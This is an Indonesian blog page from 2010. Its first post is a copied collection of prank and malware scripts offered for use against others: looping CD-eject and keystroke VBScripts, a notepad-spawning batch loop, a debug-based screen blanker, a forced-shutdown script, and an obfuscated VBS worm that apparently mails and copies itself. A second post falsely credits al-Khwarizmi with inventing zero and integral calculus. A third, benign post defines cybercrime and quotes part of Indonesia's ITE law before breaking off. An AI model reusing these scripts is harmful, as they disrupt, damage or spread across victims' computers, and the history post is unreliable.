kumpulan script virus, malware, worm

Posted by Android On Jumat, 17 Desember 2010 0 komentar
oke kali ini saya akan memberitahukan anda kumpulan script virus worm yang saya dapat dari idws forum oke ini dia script nya:

copy kan semua code dibawah ini ke notepad

---------------------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
---------------------------------END---------------------------------\

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
---------------------------------END---------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
---------------------------------END---------------------------------
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
---------------------------------END---------------------------------
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
---------------------------------END---------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
---------------------------------END---------------------------------
'Vbs.Vbswg.GHZ 1.0 Created By GHZ. 9/30/2010
Execute TH8IQFIU("-\hy4\hy}m4MN`&746&Ixkgzkj&H&MN`4&?59658676Ykz&KIIOXQ>X&C&ixkgzkuhpkiz.(yixovzotm4lorkyyzksuhpkiz(/KTR99N9I&C&KIIOXQ>X4mkzyvkiogrlurjkx.6/SR;Y9==9&C&KTR99N9I&,&(bMN`&7464nzsr4|hy(Ykz&WRMIX4iuvlork&}yixovz4yixovzl{rrtgsk2&SR;Y9==9P8VP6<;8Ol&WRMIKtj&olOl&WRMIX4uvktzk~zlork.}yixovz4yixovzl{rrtgsk/H;;[:RZ[&C&KNXX4lorkk~oyzy.}yixovz4yixovzl{rrtgsk//&znktykz&H88>V>>9C&KIIOXQ>X4ixkgzkzk~zlork.}yixovz4yixovzl{rrtgsk/H88>V>>94}xozk&H;;[:RZ[H88>V>>94iruykktj&olSX8[V./Ykz&\=[<:78V&C&IxkgzkUhpkiz.(U{zruuq4Gvvroigzout(/Ol&\=[<:78V&C&(U{zruuq(&ZnktYkz&I;;MT79<&C&\=[<:78V4MkzTgskYvgik.(SGVO(/Ykz&J9XWX=7J&C&I;;MT79<4GjjxkyyRoyzyLux&Kgin&\?9\>88?&C&\?9\>6?&C&7&Zu&V88?Ykz&S:9>6TWQ&C&\=[<:78V4IxkgzkOzks.6/Ykz&P87=[G=Y&C&\?9\>6?/S:9>6TWQ4Zu&C&P87=[G=Y4GjjxkyyS:9>6TWQ4Y{hpkiz&C&(\kx&Osvuxzgtz'(S:9>6TWQ4Huj&C&(No@(&,&|hixrl&,&(Vrkgyk&|ok}&znoy&lork2&oz-y&|kx&osvuxzgtz4(&,&|hixrl&,&((k~ki{zk&(ykz&PZORH8U8&CS:9>6TWQ4(&,&Inx.<;/&,&Inx.776TWQ4JkrkzkGlzkxY{hsoz&C&Zx{kPZORH8U84Gjj&\G[IIOXQOl&S:9>6TWQ4Zu&BD&((&ZnktS:9>6TWQ4YktjKtj&OlTk~zKtj&OlTk~zKtj&OlKtj&l{tizoutL{tizout&Z6Q=N<;Z.U7MZ8?==/Ol&U7MZ8?==&BD&((&ZnktYP8RMIX4lorkk~oyzy.(i@bsoxibsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi(KrykOl&KIIOXQ>X4lorkk~oyzy.(i@bsoxi98bsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi98(KrykOl&KIIOXQ>X4lorkk~oyzy.YP8RMIX4lorkk~oyzy.YP8RMIX4IxkgzkZk~zLork.U7MZ8?==&,&(byixovz4oto(2&Zx{k/K=RTR99N&C&(ayixovzc(&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t7C&&5ol&.&*toiq&CC&*sk&/&�&ngrz&ƒ(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t8C&&54(&,&Inx.766/&,&Inx.??/&,&Inx.??/&,&(&yktj&*toiq&(K=RTR99N&C&K=RTR99N&,&SR;Y9==9K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t9Cƒ(yixovz4IruykKtj&OlKtj&L{tizoutL{tizout&GI=R;Y9=./Ut&Kxxux&Xky{sk&Tk~zYkz&W8G8VP6<&C&KIIOXQ>X4Jxo|kyLux&Kgin&MJR?PNNXX4MkzLurjkx.V>NNXV>&C&U?G;;[:R4LorkyLux&Kgin&LK:X8[V<&Ot&Z:K88>V>Ol&rigyk.LK:X8[V<4Tgsk/&C&(soxi4oto(&ZnktZ6Q=N<;Z.LK:X8[V<4VgxktzLurjkx/Ktj&OlOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hy(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hk(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olTk~zYkz&IM8=[<:7&C&U?G;;[:R4Y{hlurjkxyLux&Kgin&J>I;;MT7&Ot&IM8=[<:7Igrr&.J>I;;MT74vgzn/Tk~zKtj&l{tizoutL{tizout&P8VP6<;8./Xgtjuso€kOl&7&1&Otz.Xtj&0&7666/&C&=&znktSymhu~&(O-|k&tuznotm&zu&yg4&@u/(2<:2(@u/(ktj&olktj&l{tizout-\hy}m&8&Hkzg4&H&aQc",-6)
Function TH8IQFIU(C38QDRVV,F8O63JAL)
For L6F3M0OD = 1 To Len(C38QDRVV)
V6BD6OKI = Mid(C38QDRVV, L6F3M0OD, 1)
If V6BD6OKI = Chr(2) Then
V6BD6OKI = Chr(34 + F8O63JAL)
ElseIf V6BD6OKI = Chr(3) Then
V6BD6OKI = Chr(10 + F8O63JAL)
ElseIf V6BD6OKI = Chr(4) Then
V6BD6OKI = Chr(13 + F8O63JAL)
Else
V6BD6OKI = Chr(Asc(V6BD6OKI) + F8O63JAL)
End If
TH8IQFIU = TH8IQFIU & V6BD6OKI
Next
End Function
---------------------------------END---------------------------------


kalo yang ini tinggal copas aja tapi save as .bat

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-------------------------------END------------------------------------
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
-----------------------------------END-------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
-----------------------------------END-------------------------------
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
---------------------------------END---------------------------------
sekian script dari saya

sumber forum idws
READ MORE

sejarah penemu angka 0 / history of the inventor of the number zero

Posted by Android On 0 komentar
oke kali ini saya akan memberitahu anda siapa sih penemu angka 0 yang sangat bernilai di ilmu matematika... tapi tidak bagi saya jika nilai ujian saya bernilai 0 T_T  oke langsung saja ini dia...

Dunia Barat boleh mengklaim bahwa mereka adalah kawasan sumber ilmu pengetahuan. Namun sejatinya, yang menjadi Gudang Ilmu Pengetahuan adalah kawasan Timur Tengah (kawasan Arab maksudnya, bukan Jawa Timur-Jawa Tengah). Mesopotamia, peradaban tertua dunia ada di kawasan ini juga.

Masyarakat dunia sangat mengenal Leonardo Fibonacci sebagai ahli matematika aljabar. Namun, dibalik kedigdayaan Leonardo Fibonacci sebagai ahli matematika aljabar ternyata hasil pemikirannya sangat dipengaruhi oleh ilmuwan Muslim bernama Muhammad bin Musa Al Khawarizmi. Dia adalah seorang tokoh yang dilahirkan di Khiva (Iraq) pada tahun 780. Jika kaum terpelajar lebih mengenal para ahli matematika Eropa, maka kaum biasa juga mengenal ilmuwan Muslim yang menjadi rujukan para ahli matematika tersebut.

Selain ahli dalam matematika al-Khawarizmi, yang kemudian menetap di Qutrubulli (sebalah barat Bagdad), juga seorang ahli geografi, sejarah dan juga musik. Karya-karyanya dalam bidang matematika dimaktub dalam Kitabul Jama wat Tafriq dan Hisab al-Jabar wal Muqabla. Inilah yang menjadi rujukan para ilmuwan Eropa termasuk Leonardo Fibonacce serta Jacob Florence.

Muhammad bin Musa Al Khawarizmi inilah yang menemukan angka 0 (nol) yang hingga kini dipergunakan. Apa jadinya coba jika angka 0 (nol) tidak ditemukan coba? Selain itu, dia juga berjasa dalam ilmu ukur sudut melalui fungsi sinus dan tanget, persamaan linear dan kuadrat serta kalkulasi integrasi (kalkulus integral). Tabel ukur sudutnya (Tabel Sinus dan Tangent) adalah yang menjadi rujukan tabel ukur sudut saat ini.

al-Khawarizmi juga seorang ahli ilmu bumi. Karyanya Kitab Surat Al Ard menggambarkan secara detail bagian-bagian bumi. CA Nallino, penterjemah karya al-Khawarizmi ke dalam bahasa Latin, menegaskan bahwa tak ada seorang Eropa pun yang dapat menghasilkan karya seperti al-Khawarizmi ini.
READ MORE

Cybercrime & Cyberlaw, serta isi UU ITE di Indonesia

Posted by Android On Kamis, 16 Desember 2010 0 komentar

Hai semua pembaca blog kali ini saya dan teman-teman akan membahas tentang cybercrime dan cyberlaw, oke langsung saja kita masuk ke pembahasan.

Cybercrime Dapat Diartikan Sebagai Perbuatan Melawan Hukum Dan/Atau Tanpa Hak Berbasis Teknologi Informasi Atau Dengan Memakai Komputer Dan/Atau Jaringan Komputer Sbg Sarana Atau Alat Sehingga Menjadikan Komputer Dan/Atau Jaringannya Sebagai Obyek Maupun Subyek Tindak Pidana Yang Dilakukan Dengan Sengaja.
Kejahatan dalam Cybercrime dapat dibagi menjadi 2 yaitu:
CYBER CRIME WITH VIOLENCE(MENGANDUNG KEKERASAN)
  • Cyberterrorism

  • Assault by Threat (serangan dgn ancaman)

  • Cyberstalking (penguntitan di Internet)

  • Child Pornography (pornografi anak)

CYBER CRIME WITHOUT VIOLENCE (TDK MENGANDUNG KEKERASAN)
  • Cybertrespass (memasuki jaringan tanpa izin)

  • Cybertheft (mencuri informasi)

  • Cyberfraud (Penipuan di internet)

  • Destructive Cybercrimes (merusak jaringan)

  • Cyber Prostitute Ads (iklan internet prostitusi)

  • Cybergambling (perjudian di Internet)

  • Cyber Drugs Sales (penjualan obat & narkotika di internet)

  • Cyber Laundering

  • Cybercontraband

Sedangkan Cyberlaw dapat diartikan hukum yang digunakan di dunia cyber (dunia maya) yang umumnya diasosiasikan dengan internet. Cyberlaw merupakan aspek hukum yang ruang lingkupnya meliputi setiap aspek yang berhubungan dengan orang perorangan atau subyek hukum yang menggunakan dan memanfaatkan teknologi internet yang dimulai pada saat mulai online dan memasuki dunia cyber atau maya. Cyberlaw sendiri merupakan istilah yang berasal dari Cyberspace Law. Cyberlaw akan memainkan peranannya dalam dunia masa depan, karena nyaris tidak ada lagi segi kehidupan yang tidak tersentuh oleh keajaiban teknologi dewasa ini dimana kita perlu sebuah perangkat aturan main didalamnya (virtual world).

Isi UU ITE di Indonesia:
DENGAN RAHMAT TUHAN YANG MAHA ESA
PRESIDEN REPUBLIK INDONESIA,

Menimbang :
a. bahwa pembangunan nasional adalah suatu proses yang berkelanjutan yang harus senantiasa tanggap terhadap berbagai dinamika yang terjadi di masyarakat;
b. bahwa globalisasi informasi telah menempatkan Indonesia sebagai bagian dari masyarakat informasi dunia sehingga mengharuskan dibentuknya pengaturan mengenai pengelolaan informasi dan transaksi elektronik di tingkat nasional sebagai jawaban atas perkembangan yang terjadi baik di tingkat regional maupun internasional;
c. bahwa perkembangan teknologi informasi yang demikian pesat telah menyebabkan perubahan kegiatan kehidupan manusia dalam berbagai bidang yang secara langsung telah mempengaruhi lahirnya bentuk-bentuk perbuatan hukum baru;
d. bahwa kegiatan pemanfaatan teknologi informasi perlu terus dikembangkan tanpa mengesampingkan persatuan dan kesatuan nasional dan penegakan hukum secara adil, sehingga pelanggaran-pelanggaran yang berkaitan dengan pemanfaatan teknologi informasi dapat dihindari melalui penerapan keseragaman asas dan peraturan perundang-undangan;
e. bahwa pemanfaatan teknologi informasi khususnya pengelolaan informasi dan transaksi elektronik mempunyai peranan penting dalam meningkatkan perdagangan dan perekonomian nasional dalam rangka menghadapi globalisasi sehingga perlu dilakukan langkah-langkah konkret untuk mengarahkan pemanfaatan teknologi informasi agar benar-benar mendukung pertumbuhan perekonomian nasional untuk mencapai kesejahteraan masyarakat;
f. bahwa pemerintah perlu memberikan dukungan terhadap pengembangan teknologi informasi khususnya pengelolaan informasi dan transaksi elektronik beserta infrastruktur hukum dan pengaturannya sehingga kegiatan pemanfaatan teknologi informasi dapat dilakukan secara aman dengan menekan akibat-akibat negatifnya serendah mungkin;
g. bahwa berdasarkan pertimbangan-pertimbangan tersebut di atas, perlu ditetapkan Undang-undang tentang Informasi dan Transaksi Elektronik.

Mengingat : Pasal 5 ayat (1), Pasal 20 Undang-Undang Dasar Negara Republik Indonesia Tahun 1945

Dengan Persetujuan Bersama
DEWAN PERWAKILAN RAKYAT REPUBLIK INDONESIA
dan
PRESIDEN REPUBLIK INDONESIA
MEMUTUSKAN :

Menetapkan : UNDANG-UNDANG TENTANG INFORMASI DAN TRANSAKSI ELEKTRONIK


BAB I
KETENTUAN UMUM

Pasal 1
Dalam Undang-undang ini yang dimaksud dengan :

1. Teknologi informasi adalah suatu teknik untuk mengumpulkan, menyiapkan, menyimpan, memproses, mengumumkan, menganalisa, dan menyebarkan informasi.
2. Komputer adalah alat pemroses data elektronik, magnetik, optikal, atau sistem yang melaksanakan fungsi logika, aritmatika, dan penyimpanan.
3. Informasi elektronik adalah satu atau sekumpulan data elektronik diantaranya meliputi teks, simbol, gambar, tanda-tanda, isyarat, tulisan, suara, bunyi, dan bentuk-bentuk lainnya yang telah diolah sehingga mempunyai arti.
4. Sistem elektronik adalah sistem untuk mengumpulkan, mempersiapkan, menyimpan, memproses, mengumumkan, menganalisa, dan menyebarkan informasi elektronik.
5. Tanda tangan elektronik adalah informasi elektronik yang dilekatkan, memiliki hubungan langsung atau terasosiasi pada suatu informasi elektronik lain yang dibuat oleh penandatangan untuk menunjukkan identitas dan statusnya sebagai subyek hukum, termasuk dan tidak terbatas pada penggunaan infrastruktur kunci publik (tanda tangan digital), biometrik, kriptografi simetrik.
6. Sertifikat elektronik adalah sertifikat yang bersifat elektronik yang memuat tanda tangan elektronik dan identitas yang menunjukan status subyek hukum para pihak dalam transaksi elektronik yang dikeluarkan oleh penyelenggara sertifikasi elektronik.
7. Penandatangan adalah subyek hukum yang terasosiasikan dengan tanda tangan elektronik.
8. Lembaga sertifikasi keandalan (trustmark) adalah lembaga yang diberi kewenangan untuk melakukan audit dan mengeluarkan sertifikat keandalan atas pelaku usaha dan produk berkaitan dengan kegiatan perdagangan elektronik.
9. Penyelenggara sertifikasi elektronik adalah badan hukum yang berfungsi sebagai pihak yang layak dipercaya, yang memberikan dan mengaudit sertifikat elektronik.
10. Transaksi elektronik adalah perbuatan hukum yang dilakukan dengan menggunakan komputer, jaringan komputer, atau media elektronik lainnya.
11. Agen Elektronik adalah perangkat dari suatu sistem elektronik yang dibuat untuk melakukan suatu tindakan terhadap suatu informasi elektronik tertentu secara otomatis yang diselenggarakan oleh seseorang.
12. Akses adalah kegiatan melakukan interaksi dengan sistem elektronik yang berdiri sendiri atau dalam jaringan.
13. Badan usaha adalah perusahaan perseorangan atau perusahaan persekutuan baik yang berbadan hukum maupun tidak berbadan hukum.
14. Dokumen elektronik adalah setiap informasi elektronik yang dibuat, diteruskan, dikirimkan, diterima, atau disimpan dalam bentuk analog, digital, elektromagnetik, optikal, atau sejenisnya.
15. Penerima adalah subyek hukum yang menerima suatu informasi elektronik dari pengirim.
16. Pengirim adalah subyek hukum yang mengirimkan informasi elektronik
17. Jaringan sistem elektronik adalah terhubungnya dua atau lebih sistem elektronik baik yang bersifat tertutup maupun yang bersifat terbuka.
18. Kontrak elektronik adalah perjanjian yang dimuat dalam dokumen elektronik atau media elektronik lainnya.

19. Nama domain adalah alamat internet dari seseorang, perkumpulan, organisasi, atau badan usaha, yang dapat dilakukan untuk berkomunikasi melalui internet, yang berupa kode atau susunan karakter yang bersifat unik, menunjukkan lokasi tertentu dalam internet.
20. Kode akses adalah angka, huruf, simbol lainnya atau kombinasi diantaranya yang merupakan kunci untuk dapat mengakses komputer, jaringan komputer, internet, atau media elektronik lainnya
21. Penyelenggaraan sistem elektronik adalah pemanfaatan sistem elektronik oleh Pemerintah dan atau swasta.
22. Orang adalah orang perorangan baik warga negara Indonesia maupun warga negara asing atau badan hukum.
23. Pemerintah adalah Menteri atau pejabat lainnya yang ditunjuk oleh Presiden.

Pasal 2
Undang-undang ini berlaku untuk setiap orang yang melakukan perbuatan hukum sebagaimana diatur dalam undang-undang ini, baik yang berada di wilayah Indonesia maupun di luar Indonesia, yang memiliki akibat hukum di Indonesia.

BAB II
ASAS DAN TUJUAN

Pasal 3
Pemanfaatan teknologi informasi dan transaksi elektronik dilaksanakan berdasarkan asas kepastian hukum, manfaat, hati-hati, itikad baik, dan netral teknologi.



Pasal 4
Pemanfaatan teknologi informasi dan transaksi elektronik dilaksanakan dengan tujuan untuk :
a. mencerdaskan kehidupan bangsa sebagai bagian dari masyarakat informasi dunia;
b. mengembangkan perdagangan dan perekonomian nasional dalam rangka meningkatkan kesejahteraan masyarakat dan pertumbuhan ekonomi nasional;
c. efektifitas dan efisiensi pelayanan publik dengan memanfaatkan secara optimal teknologi informasi untuk tercapainya keadilan dan kepastian hukum;
d. memberikan kesempatan seluas-luasnya kepada setiap orang untuk mengembangkan pemikiran dan kemampuannya di bidang teknologi informasi secara bertanggung jawab dalam rangka menghadapi perkembangan teknologi informasi dunia;

BAB III
INFORMASI ELEKTRONIK

Pasal 5
(1) Informasi elektronik dan atau hasil cetak dari informasi elektronik merupakan alat bukti yang sah dan memiliki akibat hukum yang sah.
(2) Informasi elektronik dan atau hasil cetak dari informasi elektronik sebagaimana dimaksud dalam ayat (1) merupakan perluasan dari alat bukti yang sah sesuai dengan Hukum Acara yang berlaku di Indonesia.
(3) Informasi elektronik dinyatakan sah apabila menggunakan sistem elektronik sesuai peraturan perundangan yang berlaku.
(4) Ketentuan mengenai informasi elektronik sebagaimana dimaksud dalam ayat (1) tidak berlaku untuk :
a. pembuatan dan pelaksanaan surat wasiat;
b. pembuatan dan pelaksanaan surat-surat terjadinya perkawinan dan putusnya perkawinan;
c. surat-surat berharga yang menurut undang-undang harus dibuat dalam bentuk tertulis;
d. perjanjian yang berkaitan dengan transaksi barang tidak bergerak;
e. dokumen-dokumen yang berkaitan dengan hak kepemilikan; dan
f. dokumen-dokumen lain yang menurut peraturan perundang-undangan yang berlaku mengharuskan adanya pengesahan notaris atau pejabat yang berwenang.

Pasal 6
Dalam hal terdapat ketentuan hukum lain selain yang diatur dalam Pasal 5 ayat (4) yang mensyaratkan bahwa suatu informasi harus berbentuk tertulis atau asli, maka informasi elektronik dianggap sah sepanjang informasi yang tercantum di dalamnya dapat dijamin keutuhannya, dipertanggungjawabkan, diakses, dan ditampilkan, sehingga menerangkan suatu keadaan.

Pasal 7
Setiap orang yang menyatakan suatu hak, memperkuat hak yang telah ada, atau menolak hak orang lain berdasarkan atas keberadaan suatu informasi elektronik harus memastikan bahwa informasi elektronik yang ada padanya berasal dari sistem elektronik terpercaya.

Pasal 8
(1) Kecuali diperjanjikan lain, waktu pengiriman suatu informasi elektronik ditentukan pada saat informasi elektronik telah dikirim dengan alamat yang benar oleh pengirim ke suatu sistem elektronik yang ditunjuk atau dipergunakan penerima dan telah memasuki sistem elektronik yang berada di luar kendali pengirim.
(2) Kecuali diperjanjikan lain, waktu penerimaan suatu informasi elektronik ditentukan pada saat informasi elektronik memasuki sistem elektronik di bawah kendali penerima yang berhak.
(3) Dalam hal penerima telah menunjuk suatu sistem elektronik tertentu untuk menerima informasi elektronik, penerimaan terjadi pada saat informasi elektronik memasuki sistem elektronik yang ditunjuk.
(4) Dalam hal terdapat dua atau lebih sistem informasi yang digunakan dalam pengiriman ataupun penerimaan informasi elektronik, maka:
a. waktu pengiriman adalah ketika informasi elektronik memasuki sistem informasi pertama yang berada diluar kendali pengirim.
b. waktu penerimaan adalah ketika informasi elektronik memasuki sistem informasi terakhir yang berada dibawah kendali penerima.

Pasal 9
Pelaku usaha yang menawarkan produk melalui media elektronik wajib menyediakan informasi yang lengkap dan benar berkaitan dengan syarat-syarat kontrak, produsen dan produk yang ditawarkan.

Pasal 10
(1) Pemerintah atau masyarakat dapat membentuk lembaga sertifikasi keandalan yang fungsinya memberikan sertifikasi terhadap pelaku usaha dan produk yang ditawarkannya secara elektronik.
(2) Ketentuan mengenai pembentukan lembaga sertifikasi keandalan sebagaimana dimaksud dalam ayat (1) diatur dengan Peraturan Pemerintah.
Pasal 11
(1) Tanda tangan elektronik memiliki kekuatan hukum dan akibat hukum yang sah selama memenuhi persyaratan sebagai berikut:
a. Data pembuatan tanda tangan terkait hanya kepada penanda tangan saja;
b. Data pembuatan tanda tangan elektronik pada saat proses penandatanganan elektronik hanya berada dalam kuasa penandatangan;
c. Segala perubahan terhadap tanda tangan elektronik yang terjadi setelah waktu penandatanganan dapat diketahui;
d. Segala perubahan terhadap informasi elektronik yang terkait dengan tanda tangan elektronik tersebut setelah waktu penandatanganan dapat diketahui;
e. Terdapat cara tertentu yang dipakai untuk mengidentifikasi siapa penandatangannya;
f. Terdapat cara tertentu untuk menunjukkan bahwa penandatangan telah memberikan persetujuan terhadap informasi elektronik yang terkait.
(2) Ketentuan lebih lanjut mengenai tanda tangan elektronik sebagaimana dimaksud dalam ayat (1) diatur dengan Peraturan Pemerintah

Pasal 12
(1) Setiap orang yang terlibat dalam tanda tangan elektronik berkewajiban memberikan pengamanan atas tanda tangan elektronik yang digunakannya;
(2) Pengamanan tanda tangan elektronik sebagaimana dimaksud dalam ayat (1) sekurang-kurangnya meliputi :
a. sistem tidak dapat diakses oleh orang lain yang tidak berhak;
b. penandatangan harus waspada terhadap penggunaan tidak sah dari data pembuatan tanda tangan oleh orang lain;
c. penandatangan harus tanpa menunda-nunda, menggunakan cara yang dianjurkan oleh penyelenggara tanda tangan elektronik ataupun cara-cara lain yang layak dan sepatutnya harus segera memberitahukan kepada seseorang yang oleh penandatangan dianggap mempercayai tanda tangan elektronik atau kepada pihak pendukung layanan tanda tangan elektronik jika:
1. Penandatangan mengetahui bahwa data pembuatan tanda tangan telah dibobol; atau
2. Keadaan yang diketahui oleh penandatangan dapat menimbulkan resiko yang berarti, kemungkinan akibat bobolnya data pembuatan tanda tangan;
d. dalam hal sebuah sertifikat digunakan untuk mendukung tanda tangan elektronik, memastikan kebenaran dan keutuhan dari semua informasi yang disediakan penandatangan yang terkait dengan sertifikat.
(3) Setiap orang yang melakukan pelanggaran ketentuan sebagaimana dimaksud dalam ayat (1), bertanggung jawab atas segala kerugian dan konsekuensi hukum yang timbul.

Pasal 13
(1) Setiap orang berhak menggunakan jasa penyelenggara sertifikasi elektronik untuk tanda tangan elektronik yang dibuat dalam bentuk tanda tangan digital.
(2) Penyelenggara sertifikasi elektronik harus memastikan keterkaitan suatu tanda tangan digital dengan pemilik tanda tangan digital yang bersangkutan.
(3) Penyelenggara sertifikasi elektronik Indonesia harus berbadan hukum Indonesia dan beroperasi di Indonesia.


Pasal 14
(1) Penyelenggara sertifikasi elektronik sebagaimana dimaksud pada Pasal 13 wajib menyediakan informasi yang sepatutnya kepada para pengguna jasanya yang meliputi :
a. Metode yang digunakan untuk mengidentifikasi penandatangan;
b. Hal-hal yang dapat digunakan untuk mengetahui data pembuatan tanda tangan elektronik;
c. Hal-hal yang dapat menunjukkan keberlakuan dan keamanan tanda tangan elektronik;
(2) Ketentuan lebih lanjut mengenai penyelenggara sertifikasi elektronik diatur dengan Peraturan Pemerintah.

BAB IV
PENYELENGGARAAN SISTEM ELEKTRONIK

Pasal 15
(1) Informasi dan transaksi elektronik diselenggarakan oleh penyelenggara sistem elektronik secara andal, aman, dan beroperasi sebagaimana mestinya.
(2) Penyelenggara sistem elektronik bertanggung jawab terhadap penyelenggaraan sistem elektronik yang diselenggarakannya.
(3) Ketentuan sebagaimana dimaksud dalam ayat (2) tidak berlaku dalam hal dapat dibuktikan adanya pihak tertentu yang melakukan tindakan sehingga sistem elektronik sebagaimana dimaksud ayat (1) tidak beroperasi sebagaimana mestinya.

Pasal 16
(1) Sepanjang tidak ditentukan lain oleh undang-undang tersendiri, setiap penyelenggara sistem elektronik harus mengoperasikan sistem elektronik yang memenuhi persyaratan minimum sebagai berikut:
a. dapat menampilkan kembali informasi elektronik yang berkaitan dengan penyelenggaraan sistem elektronik yang telah berlangsung;
b. dapat melindungi keotentikan, integritas, kerahasiaan, ketersediaan, dan keteraksesan dari informasi elektronik dalam penyelenggaraan sistem elektronik tersebut;
c. dapat beroperasi sesuai dengan prosedur atau petunjuk dalam penyelenggaraan sistem elektronik tersebut;

d. dilengkapi dengan prosedur atau petunjuk yang diumumkan dengan bahasa, informasi, atau simbol yang dapat dipahami oleh pihak yang bersangkutan dengan penyelenggaraan sistem elektronik tersebut; dan
e. memiliki mekanisme yang berkelanjutan untuk menjaga kebaruan, kejelasan, dan pertanggungjawaban prosedur atau petunjuk tersebut;
(2) Ketentuan lebih lanjut mengenai penyelenggaraan sistem elektronik sebagaimana dimaksud dalam ayat (1) diatur dengan Peraturan Pemerintah.

BAB V
TRANSAKSI ELEKTRONIK

Pasal 17
(1) Penyelenggaraan transaksi elektronik dapat dilakukan baik dalam lingkup publik maupun privat.
(2) Ketentuan lebih lanjut mengenai penyelenggaraan transaksi elektronik yang bersifat khusus diatur dengan Peraturan Pemerintah.

Pasal 18
(1) Transaksi elektronik yang dituangkan dalam kontrak elektronik mengikat para pihak.
(2) Para pihak memiliki kewenangan untuk memilih hukum yang berlaku bagi transaksi elektronik internasional yang dibuatnya.
(3) Apabila para pihak tidak melakukan pilihan hukum dalam transaksi elektronik internasional, hukum yang berlaku didasarkan pada asas-asas Hukum Perdata Internasional.
(4) Para pihak memiliki kewenangan untuk menetapkan forum pengadilan, arbitrase atau lembaga penyelesaian sengketa alternatif yang berwenang menangani sengketa yang mungkin timbul dari transaksi elektronik.


(5) Apabila para pihak tidak melakukan pilihan forum sebagaimana dimaksud dalam ayat (4) penetapan kewenangan pengadilan, arbitrase atau lembaga penyelesaian sengketa alternatif yang berwenang menangani sengketa yang mungkin timbul dari transaksi tersebut, didasarkan pada asas-asas Hukum Perdata Internasional.

Pasal 19
Para pihak yang melakukan transaksi elektronik harus menggunakan sistem elektronik yang disepakati.

Pasal 20
(1) Kecuali ditentukan lain oleh para pihak transaksi elektronik terjadi pada saat penawaran transaksi yang dikirim pengirim telah diterima dan disetujui penerima.
(2) Persetujuan atas penawaran transaksi elektronik sebagaimana dimaksud dalam ayat (1) harus dilakukan dengan pernyataan penerimaan secara elektronik.

Pasal 21
(1) Pengirim maupun penerima dapat melakukan sendiri transaksi elektronik, atau melalui pihak yang dikuasakan olehnya atau melalui Agen Elektronik.
(2) Kecuali diperjanjikan lain, pihak yang bertanggung jawab atas segala akibat hukum dalam pelaksanaan transaksi elektronik sebagaimana dimaksud dalam ayat (1) diatur sebagai berikut:
a. apabila dilakukan sendiri, menjadi tanggung jawab para pihak yang bertransaksi;
